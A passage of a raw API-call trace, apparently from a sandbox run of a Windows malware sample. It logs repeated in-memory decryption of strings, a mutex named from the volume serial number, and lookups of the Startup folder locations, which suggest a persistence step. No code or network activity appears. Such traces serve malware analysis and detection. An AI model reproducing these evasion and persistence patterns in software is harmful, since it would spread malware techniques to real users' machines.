0x0 [0123.988] SetLastError (dwErrCode=0x0) [0123.988] GetLastError () returned 0x0 [0123.988] SetLastError (dwErrCode=0x0) [0123.988] GetLastError () returned 0x0 [0123.988] SetLastError (dwErrCode=0x0) [0123.988] GetLastError () returned 0x0 [0123.988] SetLastError (dwErrCode=0x0) [0123.988] GetLastError () returned 0x0 [0123.988] SetLastError (dwErrCode=0x0) [0123.988] GetLastError () returned 0x0 [0123.988] SetLastError (dwErrCode=0x0) [0123.988] GetLastError () returned 0x0 [0123.988] SetLastError (dwErrCode=0x0) [0123.988] GetLastError () returned 0x0 [0123.988] SetLastError (dwErrCode=0x0) [0123.989] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x30) returned 0x20f1280 [0123.989] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x3300) returned 0x20f2190 [0123.989] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x15c) returned 0x20f12b8 [0123.989] GetTickCount () returned 0xaabf [0123.989] GetLastError () returned 0x0 [0123.989] SetLastError (dwErrCode=0x0) [0123.989] GetLocaleInfoW (in: Locale=0x800, LCType=0x58, lpLCData=0x33f908, cchData=32 | out: lpLCData="\x03") returned 16 [0123.991] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1c) returned 0x20f1420 [0123.991] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1c) returned 0x20f1448 [0123.991] GetVersion () returned 0x1db10106 [0123.991] GetCurrentProcess () returned 0xffffffff [0123.991] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x33f86c | out: TokenHandle=0x33f86c*=0x80) returned 1 [0123.991] GetTokenInformation (in: TokenHandle=0x80, TokenInformationClass=0x14, TokenInformation=0x33f864, TokenInformationLength=0x4, ReturnLength=0x33f868 | out: TokenInformation=0x33f864, ReturnLength=0x33f868) returned 1 [0123.991] CloseHandle (hObject=0x80) returned 1 [0123.991] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x20f1470 [0123.991] CryptAcquireContextW (in: phProv=0x83fcf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x83fcf0*=0xa24cf8) returned 1 [0124.009] CryptImportKey (in: hProv=0xa24cf8, pbData=0x33f760, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33f7c8 | out: phKey=0x33f7c8*=0xa24ca0) returned 1 [0124.009] CryptSetKeyParam (hKey=0xa24ca0, dwParam=0x1, pbData=0x33f7b0, dwFlags=0x0) returned 1 [0124.010] CryptDecrypt (in: hKey=0xa24ca0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f1470, pdwDataLen=0x33f77c | out: pbData=0x20f1470, pdwDataLen=0x33f77c) returned 1 [0124.010] CryptDestroyKey (hKey=0xa24ca0) returned 1 [0124.010] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x20f1498 [0124.010] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x20f14c0 [0124.010] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x20f14e8 [0124.010] CryptImportKey (in: hProv=0xa24cf8, pbData=0x33f738, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33f7a0 | out: phKey=0x33f7a0*=0xa24ca0) returned 1 [0124.010] CryptSetKeyParam (hKey=0xa24ca0, dwParam=0x1, pbData=0x33f788, dwFlags=0x0) returned 1 [0124.010] CryptDecrypt (in: hKey=0xa24ca0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f14e8, pdwDataLen=0x33f754 | out: pbData=0x20f14e8, pdwDataLen=0x33f754) returned 1 [0124.010] CryptDestroyKey (hKey=0xa24ca0) returned 1 [0124.010] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f14e8 | out: hHeap=0x20f0000) returned 1 [0124.010] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x20f1498, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0124.010] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f14c0 | out: hHeap=0x20f0000) returned 1 [0124.010] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1470 | out: hHeap=0x20f0000) returned 1 [0124.010] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x33f808, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x33f808*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0124.010] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1498 | out: hHeap=0x20f0000) returned 1 [0124.011] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x20f1470 [0124.011] CryptImportKey (in: hProv=0xa24cf8, pbData=0x33f794, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33f7fc | out: phKey=0x33f7fc*=0xa24ca0) returned 1 [0124.011] CryptSetKeyParam (hKey=0xa24ca0, dwParam=0x1, pbData=0x33f7e4, dwFlags=0x0) returned 1 [0124.011] CryptDecrypt (in: hKey=0xa24ca0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f1470, pdwDataLen=0x33f7b0 | out: pbData=0x20f1470, pdwDataLen=0x33f7b0) returned 1 [0124.011] CryptDestroyKey (hKey=0xa24ca0) returned 1 [0124.011] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x20f14b8 [0124.011] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x84 [0124.011] WaitForSingleObject (hHandle=0x84, dwMilliseconds=0x0) returned 0x102 [0124.011] CloseHandle (hObject=0x84) returned 1 [0124.011] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1470 | out: hHeap=0x20f0000) returned 1 [0124.011] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f14b8 | out: hHeap=0x20f0000) returned 1 [0124.011] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x20f1470 [0124.011] CryptImportKey (in: hProv=0xa24cf8, pbData=0x33f774, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33f7dc | out: phKey=0x33f7dc*=0xa24ca0) returned 1 [0124.011] CryptSetKeyParam (hKey=0xa24ca0, dwParam=0x1, pbData=0x33f7c4, dwFlags=0x0) returned 1 [0124.011] CryptDecrypt (in: hKey=0xa24ca0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f1470, pdwDataLen=0x33f790 | out: pbData=0x20f1470, pdwDataLen=0x33f790) returned 1 [0124.011] CryptDestroyKey (hKey=0xa24ca0) returned 1 [0124.011] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x20f1498 [0124.011] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x20f14c0 [0124.011] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x20f14e8 [0124.011] CryptImportKey (in: hProv=0xa24cf8, pbData=0x33f74c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33f7b4 | out: phKey=0x33f7b4*=0xa24ca0) returned 1 [0124.011] CryptSetKeyParam (hKey=0xa24ca0, dwParam=0x1, pbData=0x33f79c, dwFlags=0x0) returned 1 [0124.011] CryptDecrypt (in: hKey=0xa24ca0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f14e8, pdwDataLen=0x33f768 | out: pbData=0x20f14e8, pdwDataLen=0x33f768) returned 1 [0124.011] CryptDestroyKey (hKey=0xa24ca0) returned 1 [0124.011] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f14e8 | out: hHeap=0x20f0000) returned 1 [0124.011] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x20f1498, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0124.011] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f14c0 | out: hHeap=0x20f0000) returned 1 [0124.011] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1470 | out: hHeap=0x20f0000) returned 1 [0124.011] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x33f81c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x33f81c*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0124.012] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1498 | out: hHeap=0x20f0000) returned 1 [0124.012] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x20f1470 [0124.012] CryptImportKey (in: hProv=0xa24cf8, pbData=0x33f7a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33f810 | out: phKey=0x33f810*=0xa24ca0) returned 1 [0124.012] CryptSetKeyParam (hKey=0xa24ca0, dwParam=0x1, pbData=0x33f7f8, dwFlags=0x0) returned 1 [0124.012] CryptDecrypt (in: hKey=0xa24ca0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f1470, pdwDataLen=0x33f7c4 | out: pbData=0x20f1470, pdwDataLen=0x33f7c4) returned 1 [0124.012] CryptDestroyKey (hKey=0xa24ca0) returned 1 [0124.012] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x20f14b8 [0124.012] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x0 [0124.012] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\00019C354B4201") returned 0x84 [0124.012] WaitForSingleObject (hHandle=0x84, dwMilliseconds=0x0) returned 0x0 [0124.012] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1470 | out: hHeap=0x20f0000) returned 1 [0124.012] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f14b8 | out: hHeap=0x20f0000) returned 1 [0124.012] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x831f5f, lpParameter=0x33f8ac, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x8c [0124.013] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x60) returned 0x20f1470 [0124.013] CryptImportKey (in: hProv=0xa24cf8, pbData=0x33f7b8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33f820 | out: phKey=0x33f820*=0xa271b0) returned 1 [0124.013] CryptSetKeyParam (hKey=0xa271b0, dwParam=0x1, pbData=0x33f808, dwFlags=0x0) returned 1 [0124.013] CryptDecrypt (in: hKey=0xa271b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f1470, pdwDataLen=0x33f7d4 | out: pbData=0x20f1470, pdwDataLen=0x33f7d4) returned 1 [0124.013] CryptDestroyKey (hKey=0xa271b0) returned 1 [0124.013] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x20f14d8 [0124.013] CryptImportKey (in: hProv=0xa24cf8, pbData=0x33f790, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33f7f8 | out: phKey=0x33f7f8*=0xa271b0) returned 1 [0124.013] CryptSetKeyParam (hKey=0xa271b0, dwParam=0x1, pbData=0x33f7e0, dwFlags=0x0) returned 1 [0124.014] CryptDecrypt (in: hKey=0xa271b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f14d8, pdwDataLen=0x33f7ac | out: pbData=0x20f14d8, pdwDataLen=0x33f7ac) returned 1 [0124.014] CryptDestroyKey (hKey=0xa271b0) returned 1 [0124.014] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x20f1500 [0124.014] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x20f1528 [0124.014] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x20f1550 [0124.014] CryptImportKey (in: hProv=0xa24cf8, pbData=0x33f768, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33f7d0 | out: phKey=0x33f7d0*=0xa271b0) returned 1 [0124.014] CryptSetKeyParam (hKey=0xa271b0, dwParam=0x1, pbData=0x33f7b8, dwFlags=0x0) returned 1 [0124.014] CryptDecrypt (in: hKey=0xa271b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f1550, pdwDataLen=0x33f784 | out: pbData=0x20f1550, pdwDataLen=0x33f784) returned 1 [0124.014] CryptDestroyKey (hKey=0xa271b0) returned 1 [0124.014] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1550 | out: hHeap=0x20f0000) returned 1 [0124.014] ExpandEnvironmentStringsW (in: lpSrc="%localappdata%", lpDst=0x20f1500, nSize=0xf | out: lpDst="") returned 0x2c [0124.014] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1528 | out: hHeap=0x20f0000) returned 1 [0124.014] RtlReAllocateHeap (Heap=0x20f0000, Flags=0x0, Ptr=0x20f1500, Size=0x3a) returned 0x20f1500 [0124.014] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x3a) returned 0x20f1548 [0124.014] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x20f1590 [0124.014] CryptImportKey (in: hProv=0xa24cf8, pbData=0x33f764, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33f7cc | out: phKey=0x33f7cc*=0xa271b0) returned 1 [0124.014] CryptSetKeyParam (hKey=0xa271b0, dwParam=0x1, pbData=0x33f7b4, dwFlags=0x0) returned 1 [0124.014] CryptDecrypt (in: hKey=0xa271b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f1590, pdwDataLen=0x33f780 | out: pbData=0x20f1590, pdwDataLen=0x33f780) returned 1 [0124.014] CryptDestroyKey (hKey=0xa271b0) returned 1 [0124.014] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1590 | out: hHeap=0x20f0000) returned 1 [0124.014] ExpandEnvironmentStringsW (in: lpSrc="%localappdata%", lpDst=0x20f1500, nSize=0x1d | out: lpDst="") returned 0x2c [0124.014] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1548 | out: hHeap=0x20f0000) returned 1 [0124.014] RtlReAllocateHeap (Heap=0x20f0000, Flags=0x0, Ptr=0x20f1500, Size=0x72) returned 0x20f1500 [0124.014] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x72) returned 0x20f1580 [0124.014] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x20f1600 [0124.014] CryptImportKey (in: hProv=0xa24cf8, pbData=0x33f764, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33f7cc | out: phKey=0x33f7cc*=0xa271b0) returned 1 [0124.014] CryptSetKeyParam (hKey=0xa271b0, dwParam=0x1, pbData=0x33f7b4, dwFlags=0x0) returned 1 [0124.014] CryptDecrypt (in: hKey=0xa271b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f1600, pdwDataLen=0x33f780 | out: pbData=0x20f1600, pdwDataLen=0x33f780) returned 1 [0124.014] CryptDestroyKey (hKey=0xa271b0) returned 1 [0124.014] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1600 | out: hHeap=0x20f0000) returned 1 [0124.014] ExpandEnvironmentStringsW (in: lpSrc="%localappdata%", lpDst=0x20f1500, nSize=0x39 | out: lpDst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x2c [0124.014] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1580 | out: hHeap=0x20f0000) returned 1 [0124.014] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f14d8 | out: hHeap=0x20f0000) returned 1 [0124.014] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x20f1580 [0124.015] CryptImportKey (in: hProv=0xa24cf8, pbData=0x33f78c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33f7f4 | out: phKey=0x33f7f4*=0xa271b0) returned 1 [0124.015] CryptSetKeyParam (hKey=0xa271b0, dwParam=0x1, pbData=0x33f7dc, dwFlags=0x0) returned 1 [0124.015] CryptDecrypt (in: hKey=0xa271b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f1580, pdwDataLen=0x33f7a8 | out: pbData=0x20f1580, pdwDataLen=0x33f7a8) returned 1 [0124.015] CryptDestroyKey (hKey=0xa271b0) returned 1 [0124.015] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x3e) returned 0x20f15c8 [0124.015] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x3e) returned 0x20f1610 [0124.015] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x20f1658 [0124.015] CryptImportKey (in: hProv=0xa24cf8, pbData=0x33f764, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33f7cc | out: phKey=0x33f7cc*=0xa271b0) returned 1 [0124.015] CryptSetKeyParam (hKey=0xa271b0, dwParam=0x1, pbData=0x33f7b4, dwFlags=0x0) returned 1 [0124.015] CryptDecrypt (in: hKey=0xa271b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f1658, pdwDataLen=0x33f780 | out: pbData=0x20f1658, pdwDataLen=0x33f780) returned 1 [0124.015] CryptDestroyKey (hKey=0xa271b0) returned 1 [0124.015] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x10) returned 0x20f14d8 [0124.015] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x33f748 | out: phkResult=0x33f748*=0x94) returned 0x0 [0124.015] RegQueryValueExW (in: hKey=0x94, lpValueName="Startup", lpReserved=0x0, lpType=0x33f744, lpData=0x20f1610, lpcbData=0x33f74c*=0x3e | out: lpType=0x33f744*=0x2, lpData=0x20f1610*=0x98, lpcbData=0x33f74c*=0x98) returned 0xea [0124.015] RegCloseKey (hKey=0x94) returned 0x0 [0124.015] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f14d8 | out: hHeap=0x20f0000) returned 1 [0124.015] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1658 | out: hHeap=0x20f0000) returned 1 [0124.015] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1610 | out: hHeap=0x20f0000) returned 1 [0124.015] RtlReAllocateHeap (Heap=0x20f0000, Flags=0x0, Ptr=0x20f15c8, Size=0x7a) returned 0x20f15c8 [0124.015] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x7a) returned 0x20f1650 [0124.015] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x20f5498 [0124.015] CryptImportKey (in: hProv=0xa24cf8, pbData=0x33f760, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33f7c8 | out: phKey=0x33f7c8*=0xa271b0) returned 1 [0124.015] CryptSetKeyParam (hKey=0xa271b0, dwParam=0x1, pbData=0x33f7b0, dwFlags=0x0) returned 1 [0124.015] CryptDecrypt (in: hKey=0xa271b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f5498, pdwDataLen=0x33f77c | out: pbData=0x20f5498, pdwDataLen=0x33f77c) returned 1 [0124.015] CryptDestroyKey (hKey=0xa271b0) returned 1 [0124.016] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x10) returned 0x20f14d8 [0124.016] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x33f744 | out: phkResult=0x33f744*=0x94) returned 0x0 [0124.016] RegQueryValueExW (in: hKey=0x94, lpValueName="Startup", lpReserved=0x0, lpType=0x33f740, lpData=0x20f1650, lpcbData=0x33f748*=0x7a | out: lpType=0x33f740*=0x2, lpData=0x20f1650*=0x98, lpcbData=0x33f748*=0x98) returned 0xea [0124.016] RegCloseKey (hKey=0x94) returned 0x0 [0124.016] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f14d8 | out: hHeap=0x20f0000) returned 1 [0124.016] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f5498 | out: hHeap=0x20f0000) returned 1 [0124.016] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1650 | out: hHeap=0x20f0000) returned 1 [0124.016] RtlReAllocateHeap (Heap=0x20f0000, Flags=0x0, Ptr=0x20f15c8, Size=0xf2) returned 0x20f15c8 [0124.016] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0xf2) returned 0x20f5498 [0124.016] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x20f16c8 [0124.016] CryptImportKey (in: hProv=0xa24cf8, pbData=0x33f760, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33f7c8 | out: phKey=0x33f7c8*=0xa271b0) returned 1 [0124.016] CryptSetKeyParam (hKey=0xa271b0, dwParam=0x1, pbData=0x33f7b0, dwFlags=0x0) returned 1 [0124.016] CryptDecrypt (in: hKey=0xa271b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f16c8, pdwDataLen=0x33f77c | out: pbData=0x20f16c8, pdwDataLen=0x33f77c) returned 1 [0124.016] CryptDestroyKey (hKey=0xa271b0) returned 1 [0124.016] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x10) returned 0x20f14d8 [0124.016] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x33f744 | out: phkResult=0x33f744*=0x94) returned 0x0 [0124.016] RegQueryValueExW (in: hKey=0x94, lpValueName="Startup", lpReserved=0x0, lpType=0x33f740, lpData=0x20f5498, lpcbData=0x33f748*=0xf2 | out: lpType=0x33f740*=0x2, lpData="%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", lpcbData=0x33f748*=0x98) returned 0x0 [0124.016] RegCloseKey (hKey=0x94) returned 0x0 [0124.016] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f14d8 | out: hHeap=0x20f0000) returned 1 [0124.016] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x20f14d8 [0124.016] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x33f744 | out: phkResult=0x33f744*=0x94) returned 0x0 [0124.017] RegQueryValueExW (in: hKey=0x94, lpValueName="Common Startup", lpReserved=0x0, lpType=0x33f740, lpData=0x20f5530, lpcbData=0x33f748*=0x5a | out: lpType=0x33f740*=0x0, lpData=0x20f5530*=0xc4, lpcbData=0x33f748*=0x5a) returned 0x2 [0124.017] RegCloseKey (hKey=0x94) returned 0x0 [0124.017] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x33f758 | out: phkResult=0x33f758*=0x94) returned 0x0 [0124.017] RegQueryValueExW (in: hKey=0x94, lpValueName="Common Startup", lpReserved=0x0, lpType=0x33f754, lpData=0x20f5530, lpcbData=0x33f75c*=0x5a | out: lpType=0x33f754*=0x2, lpData=0x20f5530*=0xc4, lpcbData=0x33f75c*=0x78) returned 0xea [0124.017] RegCloseKey (hKey=0x94) returned 0x0 [0124.017] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f14d8 | out: hHeap=0x20f0000) returned 1 [0124.017] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f16c8 | out: hHeap=0x20f0000) returned 1 [0124.017] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f5498 | out: hHeap=0x20f0000) returned 1 [0124.017] RtlReAllocateHeap (Heap=0x20f0000, Flags=0x0, Ptr=0x20f15c8, Size=0x1e2) returned 0x20f5498 [0124.017] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e2) returned 0x20f5688 [0124.017] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x20f15c8 [0124.017] CryptImportKey (in: hProv=0xa24cf8, pbData=0x33f760, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33f7c8 | out: phKey=0x33f7c8*=0xa271b0) returned 1 [0124.017] CryptSetKeyParam (hKey=0xa271b0, dwParam=0x1, pbData=0x33f7b0, dwFlags=0x0) returned 1 [0124.017] CryptDecrypt (in: hKey=0xa271b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f15c8, pdwDataLen=0x33f77c | out: pbData=0x20f15c8, pdwDataLen=0x33f77c) returned 1 [0124.017] CryptDestroyKey (hKey=0xa271b0) returned 1 [0124.017] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x10) returned 0x20f14d8 [0124.017] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x33f744 | out: phkResult=0x33f744*=0x94) returned 0x0 [0124.017] RegQueryValueExW (in: hKey=0x94, lpValueName="Startup", lpReserved=0x0, lpType=0x33f740, lpData=0x20f5688, lpcbData=0x33f748*=0x1e2 | out: lpType=0x33f740*=0x2, lpData="%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", lpcbData=0x33f748*=0x98) returned 0x0 [0124.017] RegCloseKey (hKey=0x94) returned 0x0 [0124.017] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f14d8 | out: hHeap=0x20f0000) returned 1 [0124.017] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x20f14d8 [0124.017] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x33f744 | out: phkResult=0x33f744*=0x94) returned 0x0 [0124.018] RegQueryValueExW (in: hKey=0x94, lpValueName="Common Startup", lpReserved=0x0, lpType=0x33f740, lpData=0x20f5720, lpcbData=0x33f748*=0x14a | out: lpType=0x33f740*=0x0, lpData=0x20f5720*=0x0, lpcbData=0x33f748*=0x14a) returned 0x2 [0124.018] RegCloseKey (hKey=0x94) returned 0x0 [0124.018] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x33f758 | out: phkResult=0x33f758*=0x94) returned 0x0 [0124.018] RegQueryValueExW (in: hKey=0x94, lpValueName="Common Startup", lpReserved=0x0, lpType=0x33f754, lpData=0x20f5720, lpcbData=0x33f75c*=0x14a | out: lpType=0x33f754*=0x2, lpData="%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", lpcbData=0x33f75c*=0x78) returned 0x0 [0124.018] RegCloseKey (hKey=0x94) returned 0x0 [0124.018] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f14d8 | out: hHeap=0x20f0000) returned 1 [0124.018] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f15c8 | out: hHeap=0x20f0000) returned 1 [0124.018] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup;%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", lpDst=0x20f5498, nSize=0xf1 | out: lpDst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup;C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x99 [0124.018] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f5688 | 